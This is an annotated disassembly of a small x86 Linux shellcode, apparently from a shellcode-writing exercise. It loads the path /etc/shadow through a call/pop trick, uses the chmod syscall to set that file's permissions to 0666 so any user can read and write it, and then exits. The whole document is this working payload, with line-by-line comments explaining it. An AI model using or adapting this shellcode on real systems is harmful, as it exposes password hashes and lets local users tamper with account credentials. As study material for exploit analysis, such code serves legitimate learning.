00000000  99                cdq                 ; Clears out EDX
00000001  6A0F              push byte +0xf      ; pushes 15 to stack
00000003  58                pop eax             ; Pops 15 to EAX chmod syscall
00000004  52                push edx            ; Pushes null to stack
00000005  E80C000000        call 0x16           ; Makes call to place address of file path to chmod onto stack
0000000A  2F                das                 ;
0000000B  657463            gs jz 0x71          ;
0000000E  2F                das                 ;
0000000F  7368              jnc 0x79            ;
00000011  61                popa                ;
00000012  646F              fs outsd            ;
00000014  7700              ja 0x16             ;
00000016  5B                pop ebx             ; Pop address that contains file path to ebx
00000017  68B6010000        push dword 0x1b6    ; Push octal 666 to stack (this is the file permissions we are changing to)
0000001C  59                pop ecx             ; Pop octal 666 to ecx (Read and Write everyone
0000001D  CD80              int 0x80            ; chmod syscall
0000001F  6A01              push byte +0x1      ;
00000021  58                pop eax             ; Exit gracefully
00000022  CD80              int 0x80            ;

~                                                       
